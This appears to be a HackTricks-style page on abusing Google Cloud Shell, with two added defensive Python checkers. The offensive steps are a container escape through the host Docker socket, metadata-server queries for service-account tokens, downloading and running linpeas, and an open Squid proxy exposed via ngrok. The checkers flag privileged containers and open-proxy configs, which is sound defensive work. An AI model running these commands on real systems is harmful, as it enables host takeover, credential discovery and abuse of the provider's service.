Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert) ! Other ways to support HackTricks:
If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS !
Cloud Shell
For more information about Cloud Shell check: GCP - Cloud Shell Enum
Container Escape
Note that Google Cloud Shell runs inside a container; you can easily escape to the host with:
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
Google does not consider this a vulnerability, but it gives you a wider view of what is happening in that environment.
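From the defender's side, the `escaper` container above is recognisable purely from its configuration: privileged mode, every capability, the host network namespace and bind mounts of host paths. The following script is an added example (it is not from the original page or from Docker) that audits the JSON printed by `docker inspect` for exactly those settings. The sample JSON is constructed for this example and reproduces only the `HostConfig` fields the checks read.

```python
"""Flag container configurations that amount to host access.

Added example: walks `docker inspect` output and reports the settings the
page's `escaper` container relies on (privileged mode, CapAdd ALL, host
network/PID namespace, bind mounts of sensitive host paths).
"""
import json

# Host paths whose bind mount into a container hands over control of the host.
SENSITIVE_HOST_PATHS = ("/", "/proc", "/sys", "/var/run/docker.sock", "/etc", "/root")


def bind_source(bind):
    """Return the host-side path of a Docker bind spec 'src:dst[:opts]'."""
    return bind.split(":", 1)[0]


def audit_container(inspect_obj):
    """Return a list of human-readable findings for one inspect record."""
    host = inspect_obj.get("HostConfig", {})
    findings = []
    if host.get("Privileged"):
        findings.append("privileged: container runs with full device and capability access")
    caps = host.get("CapAdd") or []
    if any(c.upper() == "ALL" for c in caps):
        findings.append("cap-add ALL: every Linux capability granted")
    if host.get("NetworkMode") == "host":
        findings.append("network=host: container shares the host network namespace")
    if host.get("PidMode") == "host":
        findings.append("pid=host: container shares the host PID namespace")
    for bind in host.get("Binds") or []:
        src = bind_source(bind)
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"bind mount of host path {src} ({bind})")
    return findings


def audit_inspect_output(raw_json):
    """`docker inspect` prints a JSON array; return {name: findings} for flagged containers."""
    out = {}
    for record in json.loads(raw_json):
        findings = audit_container(record)
        if findings:
            out[record.get("Name", "?").lstrip("/")] = findings
    return out


# Constructed sample: the shape `docker inspect` gives for the `escaper`
# container from the page, plus an unremarkable container for contrast.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/escaper",
        "HostConfig": {
            "Privileged": True,
            "CapAdd": ["ALL"],
            "NetworkMode": "host",
            "Binds": ["/proc:/host/proc", "/sys:/host/sys", "/:/rootfs"],
        },
    },
    {
        "Name": "/web",
        "HostConfig": {
            "Privileged": False,
            "CapAdd": None,
            "NetworkMode": "bridge",
            "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
        },
    },
])

if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(f"[!] {name}")
        for finding in findings:
            print(f"    - {finding}")
```

On a real host you would feed it `docker inspect $(docker ps -q)`; the `escaper` container trips six findings, the ordinary `web` container none.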
Moreover, notice that from the host you can find a service account token:
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
With the following scopes:
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
Enumerate metadata with LinPEAS:
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
After using https://github.com/carlospolop/bf_my_gcp_permissions with the token of the service account, no permissions were discovered.
Use it as Proxy
If you want to use your Google Cloud Shell instance as a proxy, run the following commands (or add them to the .bashrc file):
sudo apt install -y squid
Just so you know, Squid is an HTTP proxy server. Create a squid.conf file with the following settings:
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
Copy the squid.conf file to /etc/squid:
sudo cp squid.conf /etc/squid
Finally run the squid service:
sudo service squid start
Use ngrok to make the proxy reachable from outside.
After running it, copy the tcp:// URL. If you want to use the proxy from a browser, remove the tcp:// prefix and the port from the URL, and enter the port in the port field of your browser's proxy settings (Squid is an HTTP proxy server).
For convenience at startup, the .bashrc file should contain the following lines:
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Check that page for other crazy ideas for running any kind of software (databases and even Windows) in Cloud Shell.
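The squid.conf above allows every client (`http_access allow all`), so once the ngrok tunnel is up it is an open proxy for anyone who finds the tcp:// address. Squid evaluates `http_access` lines in order and the first line whose ACLs all match decides the request; if no line matches, the default is the opposite of the last line. The script below is an added example (not from the original page or from Squid) that walks a squid.conf the way Squid does and reports whether an anonymous client from any address would be allowed. Both configs are constructed for the example; the hardened one uses Squid's real `proxy_auth` ACL type and the `basic_ncsa_auth` helper, and the helper path and `/etc/squid/passwd` file are assumptions for a Debian-style install.

```python
"""Check a squid.conf for an open-proxy http_access policy.

Added example: parses `acl` and `http_access` directives and performs
Squid's first-match evaluation for an unauthenticated client from an
arbitrary source address.
"""

# ACL names Squid predefines; 'all' matches every client.
BUILTIN_ANY_SOURCE = {"all"}
# 'src' arguments that cover every IPv4/IPv6 client.
ANY_SOURCE_ARGS = {"all", "0.0.0.0/0", "0.0.0.0/0.0.0.0", "::/0"}


def parse_squid_conf(text):
    """Return (acls, rules): acl name -> (type, args) and the ordered http_access rules."""
    acls, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 3:
            acls[parts[1]] = (parts[2], parts[3:])
        elif parts[0] == "http_access" and len(parts) >= 3:
            rules.append((parts[1], parts[2:]))
    return acls, rules


def acl_matches_anyone(name, acls):
    """True if the ACL matches any client unconditionally (e.g. src 0.0.0.0/0)."""
    if name.startswith("!"):
        return False  # a negated any-source ACL matches nobody
    if name in BUILTIN_ANY_SOURCE:
        return True
    acl = acls.get(name)
    if acl is None:
        return False  # unknown or restrictive built-in (e.g. localhost): not everyone
    acl_type, args = acl
    # proxy_auth, time, dst etc. impose conditions; only an all-covering src is unconditional
    return acl_type == "src" and any(a in ANY_SOURCE_ARGS for a in args)


def is_open_proxy(conf_text):
    """First-match evaluation for an anonymous client from an arbitrary address."""
    acls, rules = parse_squid_conf(conf_text)
    for action, names in rules:
        if all(acl_matches_anyone(n, acls) for n in names):
            return action == "allow"
    if not rules:
        return False  # no http_access lines at all: Squid denies
    return rules[-1][0] != "allow"  # no match: opposite of the last rule


# Constructed sample: the page's configuration, open to every client.
WEAK_CONF = """\
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
"""

# Constructed sample: requires credentials, denies everyone else.
# Helper path and password file are assumed (Debian-style layout).
HARDENED_CONF = """\
http_port 3128
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        verdict = "OPEN PROXY" if is_open_proxy(conf) else "restricted"
        print(f"{label:9s} -> {verdict}")
```

The weak config is reported as an open proxy; the hardened one is not, because an anonymous client fails the `proxy_auth` ACL and falls through to `deny all`.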